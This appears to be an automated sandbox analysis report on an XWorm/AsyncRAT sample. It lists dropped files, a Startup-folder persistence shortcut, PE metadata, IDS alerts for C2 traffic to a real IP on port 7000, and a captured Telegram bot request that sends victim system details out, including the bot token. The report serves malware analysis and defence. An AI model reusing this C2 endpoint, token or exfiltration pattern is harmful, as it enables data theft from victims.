Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nkhvfo0p.d2f.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obeios0a.opb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4v4c2dp.ur4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q55b0cc4.axz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s30ooyxh.he1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxmya4mo.qa4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ucmct3tt.4iz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ullhplw1.bnh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztu1i5bc.tyl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Download File

Process:	C:\Users\user\Desktop\z0LTqIdZ4A.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Apr 20 20:41:00 2024, mtime=Sat Apr 20 20:41:00 2024, atime=Sat Apr 20 20:41:00 2024, length=169984, window=hide
Category:	dropped
Size (bytes):	764
Entropy (8bit):	5.048967202026129
Encrypted:	false
SSDEEP:	12:8iDU242/WCFhdY//PkgLbrijAsq8mrHkBxvBmV:8iCPw+kybSAsq8mY3vBm
MD5:	2ED455316BBC063291D8676874A8F62D
SHA1:	B43448AF365D1ADF3E937B17C758162C151ED4EB
SHA-256:	80BF5031180FD0C53B9DE5750D169CA3032158580CEADFEFDE4C64D3F676F23D
SHA-512:	E4D5854B9678FAE9A2FBE88E939AD7630C73BD5BCC76244D4B713DCBE30D309D8590D7B21BD444155D1C372D7D974265AD96DA7C2524D18A83D76F4BF7686B0C
Malicious:	false
Preview:	L..................F.... ...s..ok...s..ok...s..ok...........................v.:..DG..Yr?.D..U..k0.&...&......vk.v....M)HFk...#..ok.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.V.1......X....Roaming.@......CW.^.X................................R.o.a.m.i.n.g.....b.2......X!. .XClient.exe.H......X!..X!............................'..X.C.l.i.e.n.t...e.x.e.......Y...............-.......X...........I..z.....C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......855271...........hT..CrF.f4... ..a.^....,.......hT..CrF.f4... ..a.^....,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\XClient.exe

Download File

Process:	C:\Users\user\Desktop\z0LTqIdZ4A.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	169984
Entropy (8bit):	5.473369851890486
Encrypted:	false
SSDEEP:	3072:ubYexkjTk/btjQAzsOSrDGM+lmsolAIrRuw+mqv9j1MWLQZ:u0e62byAzw+lDAA
MD5:	67183EA2FDFBAACE4C265DE91E218C59
SHA1:	A66C33B7D7D27BC5153F53D672B2F7C7D36C2AE8
SHA-256:	3F1E8E3609E6FFD53453D5CE0CA33DC7EAF06E55085D7F6C43D0C4B6DF1F974F
SHA-512:	0ECA1D1F216E81C6000AB24D9C25F25ED5F6D7A2D5B97C73093FFB771C399E8B98E1B95890FF0D0326A6F00F9C2606947C03AA91A30C9B7D0106B34DC0978622
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 84% Antivirus: Virustotal, Detection: 82%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Rt.f.............................%... ...@....@.. ....................................@..................................$..K....@..B............................................................................ ............... ..H............text...$.... ...................... ..`.rsrc...B....@......................@..@.reloc..............................@..B.................%......H........^..........&.....................................................(.....r...p. O.B...(.....r...p. .....s.........s.........s.........s..........r;..p. ....r...p. ..e..ru..p.r...p. ."...r...p. .(T...((....rd..p. ~.H..r...p"(....+.&(....&+..+5sa... .... .'..ob...(...~....-.(J...(<...~....oc...&.-..r...p.r...p. .?=..r8..p. .....r`..p. .....r...p. ._...r...p. .O...r...p..............j..................sd..............~.........*"(L...+

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.473369851890486
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	z0LTqIdZ4A.exe
File size:	169'984 bytes
MD5:	67183ea2fdfbaace4c265de91e218c59
SHA1:	a66c33b7d7d27bc5153f53d672b2f7c7d36c2ae8
SHA256:	3f1e8e3609e6ffd53453d5ce0ca33dc7eaf06e55085d7f6c43d0c4b6df1f974f
SHA512:	0eca1d1f216e81c6000ab24d9c25f25ed5f6d7a2d5b97c73093ffb771c399e8b98e1b95890ff0d0326a6f00f9c2606947c03aa91a30c9b7d0106b34dc0978622
SSDEEP:	3072:ubYexkjTk/btjQAzsOSrDGM+lmsolAIrRuw+mqv9j1MWLQZ:u0e62byAzw+lDAA
TLSH:	AFF322E06740C465D8AB9AB9843BE6A7A533B21E9C68450D3CD2FF0B3D323474467D9B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Rt.f.............................%... ...@....@.. ....................................@................................

File Icon


Icon Hash:	2eec8e8cb683b9b1

Static PE Info

General

Entrypoint:	0x41251e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x661D7452 [Mon Apr 15 18:39:14 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x124d0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x14000	0x18c42	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x10524	0x10600	8ecaddbee8c70f55ac694ba321a11e8b	False	0.5994006440839694	data	6.025755965699048	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x14000	0x18c42	0x18e00	87ccf49606a517f065f991d263d4daf6	False	0.14681807474874373	data	4.30198740021502	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2e000	0xc	0x200	e6227f9f8095fb67d5df381555f26151	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x141f0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	0.2649377593360996
RT_ICON	0x16798	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	0.3646810506566604
RT_ICON	0x17840	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	0.5549645390070922
RT_ICON	0x17ca8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2834 x 2834 px/m	0.18115257439773264
RT_ICON	0x1bed0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2834 x 2834 px/m	0.0959718443156276
RT_GROUP_ICON	0x2c6f8	0x4c	data	0.7631578947368421
RT_VERSION	0x2c744	0x314	data	0.44289340101522845
RT_MANIFEST	0x2ca58	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/20/24-23:42:03.597802	TCP	2852870	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes	7000	49737	93.123.39.225	192.168.2.4
04/20/24-23:41:58.612970	TCP	2852874	ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2	7000	49737	93.123.39.225	192.168.2.4
04/20/24-23:42:03.599198	TCP	2852923	ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	49737	7000	192.168.2.4	93.123.39.225
04/20/24-23:41:15.103401	TCP	2855924	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49737	7000	192.168.2.4	93.123.39.225

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 20, 2024 23:41:01.818878889 CEST	49736	443	192.168.2.4	149.154.167.220
Apr 20, 2024 23:41:01.818973064 CEST	443	49736	149.154.167.220	192.168.2.4
Apr 20, 2024 23:41:01.819065094 CEST	49736	443	192.168.2.4	149.154.167.220
Apr 20, 2024 23:41:01.836077929 CEST	49736	443	192.168.2.4	149.154.167.220
Apr 20, 2024 23:41:01.836149931 CEST	443	49736	149.154.167.220	192.168.2.4
Apr 20, 2024 23:41:02.257294893 CEST	443	49736	149.154.167.220	192.168.2.4
Apr 20, 2024 23:41:02.257369995 CEST	49736	443	192.168.2.4	149.154.167.220
Apr 20, 2024 23:41:02.261435986 CEST	49736	443	192.168.2.4	149.154.167.220
Apr 20, 2024 23:41:02.261456013 CEST	443	49736	149.154.167.220	192.168.2.4
Apr 20, 2024 23:41:02.261864901 CEST	443	49736	149.154.167.220	192.168.2.4
Apr 20, 2024 23:41:02.316061974 CEST	49736	443	192.168.2.4	149.154.167.220
Apr 20, 2024 23:41:02.332911015 CEST	49736	443	192.168.2.4	149.154.167.220
Apr 20, 2024 23:41:02.380117893 CEST	443	49736	149.154.167.220	192.168.2.4
Apr 20, 2024 23:41:02.679958105 CEST	443	49736	149.154.167.220	192.168.2.4
Apr 20, 2024 23:41:02.680144072 CEST	443	49736	149.154.167.220	192.168.2.4
Apr 20, 2024 23:41:02.680221081 CEST	49736	443	192.168.2.4	149.154.167.220
Apr 20, 2024 23:41:02.687825918 CEST	49736	443	192.168.2.4	149.154.167.220
Apr 20, 2024 23:41:02.807838917 CEST	49737	7000	192.168.2.4	93.123.39.225
Apr 20, 2024 23:41:03.028951883 CEST	7000	49737	93.123.39.225	192.168.2.4
Apr 20, 2024 23:41:03.029057026 CEST	49737	7000	192.168.2.4	93.123.39.225
Apr 20, 2024 23:41:03.080130100 CEST	49737	7000	192.168.2.4	93.123.39.225
Apr 20, 2024 23:41:03.347289085 CEST	7000	49737	93.123.39.225	192.168.2.4
Apr 20, 2024 23:41:15.103400946 CEST	49737	7000	192.168.2.4	93.123.39.225
Apr 20, 2024 23:41:15.332597971 CEST	7000	49737	93.123.39.225	192.168.2.4
Apr 20, 2024 23:41:15.366946936 CEST	49737	7000	192.168.2.4	93.123.39.225
Apr 20, 2024 23:41:15.629074097 CEST	7000	49737	93.123.39.225	192.168.2.4
Apr 20, 2024 23:41:27.171825886 CEST	49737	7000	192.168.2.4	93.123.39.225
Apr 20, 2024 23:41:27.395098925 CEST	7000	49737	93.123.39.225	192.168.2.4
Apr 20, 2024 23:41:27.441106081 CEST	49737	7000	192.168.2.4	93.123.39.225
Apr 20, 2024 23:41:28.613163948 CEST	7000	49737	93.123.39.225	192.168.2.4
Apr 20, 2024 23:41:28.659857988 CEST	49737	7000	192.168.2.4	93.123.39.225
Apr 20, 2024 23:41:28.921539068 CEST	49737	7000	192.168.2.4	93.123.39.225
Apr 20, 2024 23:41:29.191251993 CEST	7000	49737	93.123.39.225	192.168.2.4
Apr 20, 2024 23:41:39.191776991 CEST	49737	7000	192.168.2.4	93.123.39.225
Apr 20, 2024 23:41:39.425918102 CEST	7000	49737	93.123.39.225	192.168.2.4
Apr 20, 2024 23:41:39.445720911 CEST	49737	7000	192.168.2.4	93.123.39.225
Apr 20, 2024 23:41:39.722220898 CEST	7000	49737	93.123.39.225	192.168.2.4
Apr 20, 2024 23:41:51.222776890 CEST	49737	7000	192.168.2.4	93.123.39.225
Apr 20, 2024 23:41:51.457731962 CEST	7000	49737	93.123.39.225	192.168.2.4
Apr 20, 2024 23:41:51.459296942 CEST	49737	7000	192.168.2.4	93.123.39.225
Apr 20, 2024 23:41:51.722251892 CEST	7000	49737	93.123.39.225	192.168.2.4
Apr 20, 2024 23:41:58.612970114 CEST	7000	49737	93.123.39.225	192.168.2.4
Apr 20, 2024 23:41:58.659883976 CEST	49737	7000	192.168.2.4	93.123.39.225
Apr 20, 2024 23:42:03.360811949 CEST	49737	7000	192.168.2.4	93.123.39.225
Apr 20, 2024 23:42:03.597801924 CEST	7000	49737	93.123.39.225	192.168.2.4
Apr 20, 2024 23:42:03.599198103 CEST	49737	7000	192.168.2.4	93.123.39.225
Apr 20, 2024 23:42:03.862564087 CEST	7000	49737	93.123.39.225	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 20, 2024 23:41:01.701376915 CEST	64530	53	192.168.2.4	1.1.1.1
Apr 20, 2024 23:41:01.807029963 CEST	53	64530	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 20, 2024 23:41:01.701376915 CEST	192.168.2.4	1.1.1.1	0x7f56	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 20, 2024 23:41:01.807029963 CEST	1.1.1.1	192.168.2.4	0x7f56	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	149.154.167.220	443	6520	C:\Users\user\Desktop\z0LTqIdZ4A.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-20 21:41:02 UTC	465	OUT	GET /bot6769459273:AAE8rusUI57P-Uj11j60b70AidMpGMPPq1E/sendMessage?chat_id=6862736136&text=%E2%98%A0%20%5BXSPY%20-%20@RUSSAGENT%20%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AFF6BC8E90A1001FE1454%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%206Z46G%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XSpy%20By%20EagleSpy HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-04-20 21:41:02 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 20 Apr 2024 21:41:02 GMT Content-Type: application/json Content-Length: 524 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-04-20 21:41:02 UTC	524	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 32 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 37 36 39 34 35 39 32 37 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 41 67 65 6e 74 53 70 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 67 65 6e 74 70 69 6e 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 38 36 32 37 33 36 31 33 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 46 69 6e 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 53 75 70 70 6f 72 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 72 75 73 73 61 67 65 6e 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 31 33 36 34 39 32 36 32 2c 22 74 65 78 Data Ascii: {"ok":true,"result":{"message_id":625,"from":{"id":6769459273,"is_bot":true,"first_name":"AgentSpy","username":"agentpin_bot"},"chat":{"id":6862736136,"first_name":"Fin","last_name":"Support","username":"russagent","type":"private"},"date":1713649262,"tex

Target ID:	0
Start time:	23:39:58
Start date:	20/04/2024
Path:	C:\Users\user\Desktop\z0LTqIdZ4A.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\z0LTqIdZ4A.exe"
Imagebase:	0x8e0000
File size:	169'984 bytes
MD5 hash:	67183EA2FDFBAACE4C265DE91E218C59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
